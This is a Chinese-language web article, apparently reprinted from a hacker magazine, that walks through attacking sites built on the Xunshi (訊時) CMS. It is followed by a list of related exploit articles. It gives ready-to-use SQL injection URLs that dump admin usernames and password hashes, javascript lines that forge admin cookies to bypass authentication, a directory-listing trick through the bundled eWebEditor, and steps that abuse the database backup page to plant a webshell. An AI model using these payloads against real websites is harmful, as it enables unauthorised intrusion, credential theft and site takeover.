訊時(shí)漏洞一小結(jié)
以下本文總結(jié)來(lái)自黑防去年第9期雜志上的內(nèi)容...
先說(shuō)一個(gè)注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
這里一個(gè)注入
效果如圖:

這樣就很輕松可以得到管理用戶名與密碼..這里md5可以拿去破解.但是現(xiàn)在安全意識(shí)的提高.
密碼復(fù)雜了..很難破出來(lái)..那么我們可以通過(guò)后來(lái)cookies欺騙進(jìn)去
javascript:alert(document.cookie="adminuser="+escape("用戶名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
那么這里就會(huì)出現(xiàn)一種情況了..如果后臺(tái)找不到咋辦呢??請(qǐng)看下一漏洞讓你更輕松達(dá)到你想要的效果:
因?yàn)橛崟r(shí)結(jié)合了ewebeditor程序..而它沒(méi)有在處理的時(shí)候忽視了ewebeditor有個(gè)可以列目錄的漏洞
它是做了驗(yàn)證的..但訊時(shí)最沒(méi)做好的地方就是驗(yàn)證..我們可以通過(guò)cookies欺騙來(lái)繞過(guò)驗(yàn)證.從而可以
訪問(wèn)這頁(yè)面來(lái)列目錄..步驟如下:
javascript:alert(document.cookie="admindj=1")
http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..
效果如圖:

這樣全站目錄都能瞧了..找到后臺(tái)目錄..進(jìn)去..
那么進(jìn)了后臺(tái)怎么拿shell??上傳--備份就ok了..
那么有時(shí)候有些管理在做后臺(tái)功能的時(shí)候把備份頁(yè)面去掉了...而他本機(jī)里備份頁(yè)面還是存在的..
這個(gè)我也碰到過(guò)一次..你都可以通過(guò)列目錄來(lái)實(shí)現(xiàn)..
javascript:alert(document.cookie="admindj=1")
http://www.xx.com/admin/admin_db_backup.asp?action=BackupData
備份ok..
那么以上兩個(gè)漏洞都被管理封住了...咋辦??上面兩個(gè)是比較常見(jiàn)的..那么下面一個(gè)注入漏洞呢?
在admin目錄下有個(gè)admin_lm_edit.asp頁(yè)面..里面的id沒(méi)有過(guò)濾 那么我們就可以先cookies下
然后訪問(wèn)此頁(yè)面進(jìn)行注入..步驟如下:
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
然后請(qǐng)求admin/admin_chk.asp頁(yè)面
輸入注入語(yǔ)句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
效果如圖所示:

相關(guān)文章
- 最近看到網(wǎng)上曝出的dedecms最新版本的一個(gè)注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開(kāi).但是在我實(shí)際測(cè)試過(guò)程當(dāng)中,發(fā)現(xiàn)無(wú)法復(fù)現(xiàn)2013-06-11
- SQL注入攻擊的危害性很大。在講解其防止辦法之前,數(shù)據(jù)庫(kù)管理員有必要先了解一下其攻擊的原理。這有利于管理員采取有針對(duì)性的防治措施2012-07-10
- 一直以來(lái)很多我網(wǎng)站都被植入了很多后門,這里簡(jiǎn)單的分下黑客常用的手段,方便管理員或站長(zhǎng)注意防御2013-01-10
訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說(shuō)明
訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說(shuō)明,使用訊時(shí)網(wǎng)站管理系統(tǒng)的朋友可以參考下。2011-07-15- php后門木馬對(duì)大家來(lái)說(shuō)一點(diǎn)都不陌生吧,但是它的種類您又知多少呢2012-06-28
- 不知道各位。在上傳的時(shí)候。 有沒(méi)需要過(guò)。 一個(gè)上傳。 不修改名字。。然后上傳目錄已經(jīng)被程序所定義了。2011-04-01
phpcms2008 代碼執(zhí)行 批量getshell EXP(使用菜刀)
這篇文章主要介紹了phpcms2008 代碼執(zhí)行 批量getshell EXP的相關(guān)資料,需要的朋友可以參考下2014-05-09- php后臺(tái)插一句話的思路加114網(wǎng)址導(dǎo)航后臺(tái)拿webshell的方法。2011-09-29
網(wǎng)站后臺(tái)腳本漏洞挖掘技巧,基于工具快速挖掘
現(xiàn)在很多搞web開(kāi)發(fā)的人,腳本安全做得真爛,簡(jiǎn)單而又“復(fù)雜”過(guò)濾兩下,事實(shí)上根本沒(méi)理解到真正的方法,也怪90%的腳本書(shū)上只講語(yǔ)法,順便鄙視下國(guó)內(nèi)那些XX磚家寫(xiě)的書(shū),不講2011-05-15- 大家都知道,沒(méi)有一臺(tái)電腦是完全安全的,都有一個(gè)攻破點(diǎn),下面小編就以實(shí)例來(lái)講解一下,一起來(lái)看看吧2016-09-01

